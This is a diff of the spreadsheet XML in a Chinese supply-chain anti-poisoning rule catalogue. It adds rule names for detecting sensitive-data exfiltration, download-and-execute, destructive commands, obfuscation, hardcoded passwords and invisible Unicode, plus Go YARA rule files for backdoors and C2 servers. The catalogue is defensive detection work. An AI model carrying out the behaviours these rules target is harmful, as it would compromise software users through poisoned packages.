+    <t>5.7 检测恶意URL</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>5.8 下载执行检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>5.6 破坏性指令检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>3.3 木马下载执行</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>3.1 敏感信息外发</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>4.3 混淆代码检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>4.2 危险命令执行</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>4.1 下载执行检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>6.1 敏感信息外发</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>6.2 恶意代码解密执行</t>
+  </si>
+  <si>
+    <t>6.3 访问恶意网址</t>
+  </si>
+  <si>
+    <t>6.4 混淆代码检测</t>
+  </si>
+  <si>
+    <t>7.1 硬编码密码检测</t>
+  </si>
+  <si>
+    <t>7.1 硬编码密码检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>7.2 ssh密码检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>7.3 配置文件密码检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>7.4 硬编码密码变量检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>7.5 不可见unicode字符检测</t>
+    <phoneticPr fontId="1" type="noConversion"/>
   </si>
 </sst>
 </file>
@@ -763,7 +871,7 @@
       <patternFill patternType="gray125"/>
     </fill>
   </fills>
-  <borders count="2">
+  <borders count="4">
     <border>
       <left/>
       <right/>
@@ -786,13 +894,33 @@
       </bottom>
       <diagonal/>
     </border>
+    <border>
+      <left style="thin">
+        <color auto="1"/>
+      </left>
+      <right style="thin">
+        <color auto="1"/>
+      </right>
+      <top/>
+      <bottom/>
+      <diagonal/>
+    </border>
+    <border>
+      <left style="thin">
+        <color auto="1"/>
+      </left>
+      <right/>
+      <top/>
+      <bottom/>
+      <diagonal/>
+    </border>
   </borders>
   <cellStyleXfs count="1">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
       <alignment vertical="center"/>
     </xf>
   </cellStyleXfs>
-  <cellXfs count="6">
+  <cellXfs count="11">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0">
       <alignment vertical="center"/>
     </xf>
@@ -809,6 +937,21 @@
       <alignment vertical="center" wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment vertical="center" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="2" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="2" fillId="0" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
+      <alignment vertical="center"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="3" xfId="0" applyFont="1" applyFill="1" applyBorder="1">
       <alignment vertical="center"/>
     </xf>
   </cellXfs>
@@ -1115,10 +1258,10 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="x14ac xr xr2 xr3" xr:uid="{00000000-0001-0000-0000-000000000000}">
-  <dimension ref="A1:G54"/>
+  <dimension ref="A1:H54"/>
   <sheetViews>
-    <sheetView tabSelected="1" topLeftCell="A4" workbookViewId="0">
-      <selection activeCell="B6" sqref="B6"/>
+    <sheetView tabSelected="1" topLeftCell="C1" workbookViewId="0">
+      <selection activeCell="H3" sqref="H3"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr defaultColWidth="9" defaultRowHeight="13.5" x14ac:dyDescent="0.3"/>
@@ -1129,9 +1272,10 @@
     <col min="5" max="5" width="14.1328125" customWidth="1"/>
     <col min="6" max="6" width="44.46484375" customWidth="1"/>
     <col min="7" max="7" width="43.86328125" style="4" customWidth="1"/>
+    <col min="8" max="8" width="13.6640625" customWidth="1"/>
   </cols>
   <sheetData>
-    <row r="1" spans="1:7" s="1" customFormat="1" x14ac:dyDescent="0.3">
+    <row r="1" spans="1:8" s="1" customFormat="1" ht="27" x14ac:dyDescent="0.3">
       <c r="A1" s="2" t="s">
         <v>0</v>
       </c>
@@ -1153,8 +1297,11 @@
       <c r="G1" s="4" t="s">
         <v>142</v>
       </c>
-    </row>
-    <row r="2" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
+      <c r="H1" s="6" t="s">
+        <v>169</v>
+      </c>
+    </row>
+    <row r="2" spans="1:8" ht="94.5" x14ac:dyDescent="0.3">
       <c r="A2" s="3" t="s">
         <v>6</v>
       </c>
@@ -1176,8 +1323,11 @@
       <c r="G2" s="4" t="s">
         <v>140</v>
       </c>
-    </row>
-    <row r="3" spans="1:7" ht="216" x14ac:dyDescent="0.3">
+      <c r="H2" s="8" t="s">
+        <v>170</v>
+      </c>
+    </row>
+    <row r="3" spans="1:8" ht="216" x14ac:dyDescent="0.3">
       <c r="A3" s="5" t="s">
         <v>155</v>
       </c>
@@ -1199,8 +1349,11 @@
       <c r="G3" s="4" t="s">
         <v>161</v>
       </c>
-    </row>
-    <row r="4" spans="1:7" ht="189" x14ac:dyDescent="0.3">
+      <c r="H3" s="8" t="s">
+        <v>173</v>
+      </c>
+    </row>
+    <row r="4" spans="1:8" ht="189" x14ac:dyDescent="0.3">
       <c r="A4" s="5" t="s">
         <v>155</v>
       </c>
@@ -1222,8 +1375,11 @@
       <c r="G4" s="4" t="s">
         <v>161</v>
       </c>
-    </row>
-    <row r="5" spans="1:7" ht="189" x14ac:dyDescent="0.3">
+      <c r="H4" s="8" t="s">
+        <v>173</v>
+      </c>
+    </row>
+    <row r="5" spans="1:8" ht="189" x14ac:dyDescent="0.3">
       <c r="A5" s="5" t="s">
         <v>155</v>
       </c>
@@ -1245,8 +1401,11 @@
       <c r="G5" s="4" t="s">
         <v>161</v>
       </c>
-    </row>
-    <row r="6" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
+      <c r="H5" s="9" t="s">
+        <v>173</v>
+      </c>
+    </row>
+    <row r="6" spans="1:8" ht="94.5" x14ac:dyDescent="0.3">
       <c r="A6" s="5" t="s">
         <v>6</v>
       </c>
@@ -1268,8 +1427,11 @@
       <c r="G6" s="4" t="s">
         <v>168</v>
       </c>
-    </row>
-    <row r="7" spans="1:7" ht="81" x14ac:dyDescent="0.3">
+      <c r="H6" s="8" t="s">
+        <v>170</v>
+      </c>
+    </row>
+    <row r="7" spans="1:8" ht="81" x14ac:dyDescent="0.3">
       <c r="A7" s="3" t="s">
         <v>6</v>
       </c>
@@ -1291,8 +1453,11 @@
       <c r="G7" s="4" t="s">
         <v>141</v>
       </c>
-    </row>
-    <row r="8" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+      <c r="H7" s="7" t="s">
+        <v>171</v>
+      </c>
+    </row>
+    <row r="8" spans="1:8" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A8" s="3" t="s">
         <v>6</v>
       </c>
@@ -1314,8 +1479,11 @@
       <c r="G8" s="4" t="s">
         <v>141</v>
       </c>
-    </row>
-    <row r="9" spans="1:7" ht="337.5" x14ac:dyDescent="0.3">
+      <c r="H8" s="7" t="s">
+        <v>172</v>
+      </c>
+    </row>
+    <row r="9" spans="1:8" ht="337.5" x14ac:dyDescent="0.3">
       <c r="A9" s="3" t="s">
         <v>16</v>
       </c>
@@ -1337,8 +1505,11 @@
       <c r="G9" s="4" t="s">
         <v>111</v>
       </c>
-    </row>
-    <row r="10" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
+      <c r="H9" s="10" t="s">
+        <v>174</v>
+      </c>
+    </row>
+    <row r="10" spans="1:8" ht="94.5" x14ac:dyDescent="0.3">
       <c r="A10" s="3" t="s">
         <v>16</v>
       </c>
@@ -1360,8 +1531,11 @@
       <c r="G10" s="4" t="s">
         <v>109</v>
       </c>
-    </row>
-    <row r="11" spans="1:7" ht="94.5" x14ac:dyDescent="0.3">
+      <c r="H10" s="10" t="s">
+        <v>175</v>
+      </c>
+    </row>
+    <row r="11" spans="1:8" ht="94.5" x14ac:dyDescent="0.3">
       <c r="A11" s="3" t="s">
         <v>16</v>
       </c>
@@ -1383,8 +1557,11 @@
       <c r="G11" s="4" t="s">
         <v>112</v>
       </c>
-    </row>
-    <row r="12" spans="1:7" ht="175.5" x14ac:dyDescent="0.3">
+      <c r="H11" s="10" t="s">
+        <v>176</v>
+      </c>
+    </row>
+    <row r="12" spans="1:8" ht="175.5" x14ac:dyDescent="0.3">
       <c r="A12" s="3" t="s">
         <v>16</v>
       </c>
@@ -1406,8 +1583,11 @@
       <c r="G12" s="4" t="s">
         <v>125</v>
       </c>
-    </row>
-    <row r="13" spans="1:7" ht="175.5" x14ac:dyDescent="0.3">
+      <c r="H12" s="10" t="s">
+        <v>180</v>
+      </c>
+    </row>
+    <row r="13" spans="1:8" ht="175.5" x14ac:dyDescent="0.3">
       <c r="A13" s="3" t="s">
         <v>16</v>
       </c>
@@ -1429,8 +1609,11 @@
       <c r="G13" s="4" t="s">
         <v>113</v>
       </c>
-    </row>
-    <row r="14" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H13" s="7" t="s">
+        <v>177</v>
+      </c>
+    </row>
+    <row r="14" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A14" s="3" t="s">
         <v>16</v>
       </c>
@@ -1452,8 +1635,11 @@
       <c r="G14" s="4" t="s">
         <v>113</v>
       </c>
-    </row>
-    <row r="15" spans="1:7" ht="148.5" x14ac:dyDescent="0.3">
+      <c r="H14" s="7" t="s">
+        <v>177</v>
+      </c>
+    </row>
+    <row r="15" spans="1:8" ht="148.5" x14ac:dyDescent="0.3">
       <c r="A15" s="3" t="s">
         <v>16</v>
       </c>
@@ -1475,8 +1661,11 @@
       <c r="G15" s="4" t="s">
         <v>115</v>
       </c>
-    </row>
-    <row r="16" spans="1:7" ht="81" x14ac:dyDescent="0.3">
+      <c r="H15" s="10" t="s">
+        <v>179</v>
+      </c>
+    </row>
+    <row r="16" spans="1:8" ht="81" x14ac:dyDescent="0.3">
       <c r="A16" s="3" t="s">
         <v>16</v>
       </c>
@@ -1498,8 +1687,11 @@
       <c r="G16" s="4" t="s">
         <v>117</v>
       </c>
-    </row>
-    <row r="17" spans="1:7" ht="81" x14ac:dyDescent="0.3">
+      <c r="H16" s="10" t="s">
+        <v>181</v>
+      </c>
+    </row>
+    <row r="17" spans="1:8" ht="81" x14ac:dyDescent="0.3">
       <c r="A17" s="3" t="s">
         <v>16</v>
       </c>
@@ -1521,8 +1713,11 @@
       <c r="G17" s="4" t="s">
         <v>120</v>
       </c>
-    </row>
-    <row r="18" spans="1:7" ht="81" x14ac:dyDescent="0.3">
+      <c r="H17" s="10" t="s">
+        <v>180</v>
+      </c>
+    </row>
+    <row r="18" spans="1:8" ht="81" x14ac:dyDescent="0.3">
       <c r="A18" s="3" t="s">
         <v>16</v>
       </c>
@@ -1544,8 +1739,11 @@
       <c r="G18" s="4" t="s">
         <v>116</v>
       </c>
-    </row>
-    <row r="19" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+      <c r="H18" s="7" t="s">
+        <v>178</v>
+      </c>
+    </row>
+    <row r="19" spans="1:8" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A19" s="3" t="s">
         <v>43</v>
       </c>
@@ -1567,8 +1765,11 @@
       <c r="G19" s="4" t="s">
         <v>121</v>
       </c>
-    </row>
-    <row r="20" spans="1:7" ht="189" x14ac:dyDescent="0.3">
+      <c r="H19" s="9" t="s">
+        <v>182</v>
+      </c>
+    </row>
+    <row r="20" spans="1:8" ht="189" x14ac:dyDescent="0.3">
       <c r="A20" s="3" t="s">
         <v>43</v>
       </c>
@@ -1590,8 +1791,11 @@
       <c r="G20" s="4" t="s">
         <v>122</v>
       </c>
-    </row>
-    <row r="21" spans="1:7" ht="378" x14ac:dyDescent="0.3">
+      <c r="H20" s="9" t="s">
+        <v>183</v>
+      </c>
+    </row>
+    <row r="21" spans="1:8" ht="378" x14ac:dyDescent="0.3">
       <c r="A21" s="3" t="s">
         <v>51</v>
       </c>
@@ -1613,8 +1817,11 @@
       <c r="G21" s="4" t="s">
         <v>144</v>
       </c>
-    </row>
-    <row r="22" spans="1:7" ht="405" x14ac:dyDescent="0.3">
+      <c r="H21" s="9" t="s">
+        <v>184</v>
+      </c>
+    </row>
+    <row r="22" spans="1:8" ht="405" x14ac:dyDescent="0.3">
       <c r="A22" s="3" t="s">
         <v>51</v>
       </c>
@@ -1636,8 +1843,11 @@
       <c r="G22" s="4" t="s">
         <v>147</v>
       </c>
-    </row>
-    <row r="23" spans="1:7" ht="409.5" x14ac:dyDescent="0.3">
+      <c r="H22" s="9" t="s">
+        <v>185</v>
+      </c>
+    </row>
+    <row r="23" spans="1:8" ht="409.5" x14ac:dyDescent="0.3">
       <c r="A23" s="3" t="s">
         <v>51</v>
       </c>
@@ -1659,8 +1869,11 @@
       <c r="G23" s="4" t="s">
         <v>145</v>
       </c>
-    </row>
-    <row r="24" spans="1:7" ht="405" x14ac:dyDescent="0.3">
+      <c r="H23" s="9" t="s">
+        <v>185</v>
+      </c>
+    </row>
+    <row r="24" spans="1:8" ht="405" x14ac:dyDescent="0.3">
       <c r="A24" s="3" t="s">
         <v>51</v>
       </c>
@@ -1682,8 +1895,11 @@
       <c r="G24" s="4" t="s">
         <v>148</v>
       </c>
-    </row>
-    <row r="25" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H24" s="9" t="s">
+        <v>186</v>
+      </c>
+    </row>
+    <row r="25" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A25" s="3" t="s">
         <v>59</v>
       </c>
@@ -1705,8 +1921,11 @@
       <c r="G25" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="26" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H25" t="s">
+        <v>188</v>
+      </c>
+    </row>
+    <row r="26" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A26" s="3" t="s">
         <v>59</v>
       </c>
@@ -1728,8 +1947,11 @@
       <c r="G26" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="27" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H26" t="s">
+        <v>188</v>
+      </c>
+    </row>
+    <row r="27" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A27" s="3" t="s">
         <v>59</v>
       </c>
@@ -1751,8 +1973,11 @@
       <c r="G27" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="28" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H27" t="s">
+        <v>188</v>
+      </c>
+    </row>
+    <row r="28" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A28" s="3" t="s">
         <v>59</v>
       </c>
@@ -1774,8 +1999,11 @@
       <c r="G28" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="29" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H28" t="s">
+        <v>188</v>
+      </c>
+    </row>
+    <row r="29" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A29" s="3" t="s">
         <v>59</v>
       </c>
@@ -1797,8 +2025,11 @@
       <c r="G29" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="30" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H29" t="s">
+        <v>189</v>
+      </c>
+    </row>
+    <row r="30" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A30" s="3" t="s">
         <v>59</v>
       </c>
@@ -1820,8 +2051,11 @@
       <c r="G30" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="31" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H30" t="s">
+        <v>188</v>
+      </c>
+    </row>
+    <row r="31" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A31" s="3" t="s">
         <v>59</v>
       </c>
@@ -1843,8 +2077,11 @@
       <c r="G31" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="32" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H31" t="s">
+        <v>188</v>
+      </c>
+    </row>
+    <row r="32" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A32" s="3" t="s">
         <v>59</v>
       </c>
@@ -1866,8 +2103,11 @@
       <c r="G32" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="33" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H32" t="s">
+        <v>189</v>
+      </c>
+    </row>
+    <row r="33" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A33" s="3" t="s">
         <v>59</v>
       </c>
@@ -1889,8 +2129,11 @@
       <c r="G33" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="34" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H33" t="s">
+        <v>190</v>
+      </c>
+    </row>
+    <row r="34" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A34" s="3" t="s">
         <v>59</v>
       </c>
@@ -1912,8 +2155,11 @@
       <c r="G34" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="35" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H34" t="s">
+        <v>188</v>
+      </c>
+    </row>
+    <row r="35" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A35" s="3" t="s">
         <v>59</v>
       </c>
@@ -1935,8 +2181,11 @@
       <c r="G35" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="36" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H35" s="7" t="s">
+        <v>187</v>
+      </c>
+    </row>
+    <row r="36" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A36" s="3" t="s">
         <v>59</v>
       </c>
@@ -1958,8 +2207,11 @@
       <c r="G36" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="37" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H36" s="7" t="s">
+        <v>187</v>
+      </c>
+    </row>
+    <row r="37" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A37" s="3" t="s">
         <v>59</v>
       </c>
@@ -1981,8 +2233,11 @@
       <c r="G37" s="4" t="s">
         <v>143</v>
       </c>
-    </row>
-    <row r="38" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+      <c r="H37" s="7" t="s">
+        <v>187</v>
+      </c>
+    </row>
+    <row r="38" spans="1:8" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A38" s="3" t="s">
         <v>79</v>
       </c>
@@ -2004,8 +2259,11 @@
       <c r="G38" s="4" t="s">
         <v>149</v>
       </c>
-    </row>
-    <row r="39" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+      <c r="H38" s="10" t="s">
+        <v>192</v>
+      </c>
+    </row>
+    <row r="39" spans="1:8" ht="54" x14ac:dyDescent="0.3">
       <c r="A39" s="3" t="s">
         <v>79</v>
       </c>
@@ -2027,8 +2285,11 @@
       <c r="G39" s="4" t="s">
         <v>150</v>
       </c>
-    </row>
-    <row r="40" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+      <c r="H39" s="10" t="s">
+        <v>193</v>
+      </c>
+    </row>
+    <row r="40" spans="1:8" ht="54" x14ac:dyDescent="0.3">
       <c r="A40" s="3" t="s">
         <v>79</v>
       </c>
@@ -2050,8 +2311,11 @@
       <c r="G40" s="4" t="s">
         <v>151</v>
       </c>
-    </row>
-    <row r="41" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+      <c r="H40" t="s">
+        <v>191</v>
+      </c>
+    </row>
+    <row r="41" spans="1:8" ht="54" x14ac:dyDescent="0.3">
       <c r="A41" s="3" t="s">
         <v>79</v>
       </c>
@@ -2073,8 +2337,11 @@
       <c r="G41" s="4" t="s">
         <v>152</v>
       </c>
-    </row>
-    <row r="42" spans="1:7" ht="67.5" x14ac:dyDescent="0.3">
+      <c r="H41" s="7" t="s">
+        <v>194</v>
+      </c>
+    </row>
+    <row r="42" spans="1:8" ht="67.5" x14ac:dyDescent="0.3">
       <c r="A42" s="3" t="s">
         <v>79</v>
       </c>
@@ -2096,8 +2363,11 @@
       <c r="G42" s="4" t="s">
         <v>153</v>
       </c>
-    </row>
-    <row r="43" spans="1:7" ht="54" x14ac:dyDescent="0.3">
+      <c r="H42" s="10" t="s">
+        <v>195</v>
+      </c>
+    </row>
+    <row r="43" spans="1:8" ht="54" x14ac:dyDescent="0.3">
       <c r="A43" s="3" t="s">
         <v>79</v>
       </c>
@@ -2119,8 +2389,11 @@
       <c r="G43" s="4" t="s">
         <v>130</v>
       </c>
-    </row>
-    <row r="44" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H43" s="10" t="s">
+        <v>196</v>
+      </c>
+    </row>
+    <row r="44" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A44" s="3" t="s">
         <v>96</v>
       </c>
@@ -2139,8 +2412,11 @@
       <c r="F44" s="3" t="s">
         <v>9</v>
       </c>
-    </row>
-    <row r="45" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H44" s="8" t="s">
+        <v>173</v>
+      </c>
+    </row>
+    <row r="45" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A45" s="3" t="s">
         <v>96</v>
       </c>
@@ -2159,8 +2435,11 @@
       <c r="F45" s="3" t="s">
         <v>9</v>
       </c>
-    </row>
-    <row r="46" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H45" s="8" t="s">
+        <v>173</v>
+      </c>
+    </row>
+    <row r="46" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A46" s="3" t="s">
         <v>96</v>
       </c>
@@ -2179,8 +2458,11 @@
       <c r="F46" s="3" t="s">
         <v>9</v>
       </c>
-    </row>
-    <row r="47" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H46" s="8" t="s">
+        <v>173</v>
+      </c>
+    </row>
+    <row r="47" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A47" s="3" t="s">
         <v>96</v>
       </c>
@@ -2199,8 +2481,11 @@
       <c r="F47" s="3" t="s">
         <v>9</v>
       </c>
-    </row>
-    <row r="48" spans="1:7" x14ac:dyDescent="0.3">
+      <c r="H47" s="8" t="s">
+        <v>173</v>
+      </c>
+    </row>
+    <row r="48" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A48" s="3" t="s">
         <v>96</v>
       </c>
@@ -2219,8 +2504,11 @@
       <c r="F48" s="3" t="s">
         <v>9</v>
       </c>
-    </row>
-    <row r="49" spans="1:6" x14ac:dyDescent="0.3">
+      <c r="H48" s="8" t="s">
+        <v>173</v>
+      </c>
+    </row>
+    <row r="49" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A49" s="3" t="s">
         <v>96</v>
       </c>
@@ -2239,8 +2527,11 @@
       <c r="F49" s="3" t="s">
         <v>9</v>
       </c>
-    </row>
-    <row r="50" spans="1:6" x14ac:dyDescent="0.3">
+      <c r="H49" s="8" t="s">
+        <v>173</v>
+      </c>
+    </row>
+    <row r="50" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A50" s="3" t="s">
         <v>96</v>
       </c>
@@ -2259,8 +2550,11 @@
       <c r="F50" s="3" t="s">
         <v>9</v>
       </c>
-    </row>
-    <row r="51" spans="1:6" x14ac:dyDescent="0.3">
+      <c r="H50" s="8" t="s">
+        <v>173</v>
+      </c>
+    </row>
+    <row r="51" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A51" s="3"/>
       <c r="B51" s="3"/>
       <c r="C51" s="3"/>
@@ -2268,7 +2562,7 @@
       <c r="E51" s="3"/>
       <c r="F51" s="3"/>
     </row>
-    <row r="52" spans="1:6" x14ac:dyDescent="0.3">
+    <row r="52" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A52" s="3"/>
       <c r="B52" s="3"/>
       <c r="C52" s="3"/>
@@ -2276,7 +2570,7 @@
       <c r="E52" s="3"/>
       <c r="F52" s="3"/>
     </row>
-    <row r="53" spans="1:6" x14ac:dyDescent="0.3">
+    <row r="53" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A53" s="3"/>
       <c r="B53" s="3"/>
       <c r="C53" s="3"/>
@@ -2284,7 +2578,7 @@
       <c r="E53" s="3"/>
       <c r="F53" s="3"/>
     </row>
-    <row r="54" spans="1:6" x14ac:dyDescent="0.3">
+    <row r="54" spans="1:8" x14ac:dyDescent="0.3">
       <c r="A54" s="3"/>
       <c r="B54" s="3"/>
       <c r="C54" s="3"/>

--- a/tools/SoftwareSupplyChainSecurity-v1/防投毒规则.xlsx
+++ b/tools/SoftwareSupplyChainSecurity-v1/防投毒规则.xlsx
@@ -1,14 +1,14 @@
 
 <file path=xl/workbook.xml><?xml version="1.0" encoding="utf-8"?>
 <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" mc:Ignorable="x15 xr xr6 xr10 xr2">
-  <fileVersion appName="xl" lastEdited="7" lowestEdited="5" rupBuild="20396"/>
+  <fileVersion appName="xl" lastEdited="7" lowestEdited="5" rupBuild="20397"/>
   <workbookPr/>
   <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
     <mc:Choice Requires="x15">
-      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="C:\Users\l00609832\Desktop\"/>
+      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="D:\PycharmProjects\new-repo\anti-poisoning\tools\SoftwareSupplyChainSecurity-v1\"/>
     </mc:Choice>
   </mc:AlternateContent>
-  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{74F7B6D1-D9BE-4128-8C5C-EE0D76AEACA3}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
+  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{7EFFA2B3-49A2-440E-8780-F57F2C98107E}" xr6:coauthVersionLast="36" xr6:coauthVersionMax="36" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
   <bookViews>
     <workbookView xWindow="0" yWindow="0" windowWidth="28620" windowHeight="11205" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
   </bookViews>
@@ -16,14 +16,14 @@
     <sheet name="各社区使用规则集统计" sheetId="1" r:id="rId1"/>
   </sheets>
   <definedNames>
-    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">各社区使用规则集统计!$A$1:$G$50</definedName>
+    <definedName name="_xlnm._FilterDatabase" localSheetId="0" hidden="1">各社区使用规则集统计!$A$1:$G$53</definedName>
   </definedNames>
   <calcPr calcId="144525"/>
 </workbook>
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="686" uniqueCount="169">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="427" uniqueCount="207">
   <si>
     <t>语言类型</t>
   </si>
@@ -725,6 +725,179 @@
 此外，如果在开源代码中存放口令，容易被黑客窃取，从而造成损失。
 如果属于误报，请进行屏蔽。
 修复方式：放到执行环境的环境变量或配置文件中。</t>
+  </si>
+  <si>
+    <t>GO</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>golang_scan/go_backdoor.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>golang_scan/go_cc_server.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>golang_scan/go_download_exec.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>golang_scan/go_listen_backdoor.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
+  </si>
+  <si>
+    <t>golang_scan/go_obfuscated.yar</t>
+    <phoneticPr fontId="1" type="noConversion"/>
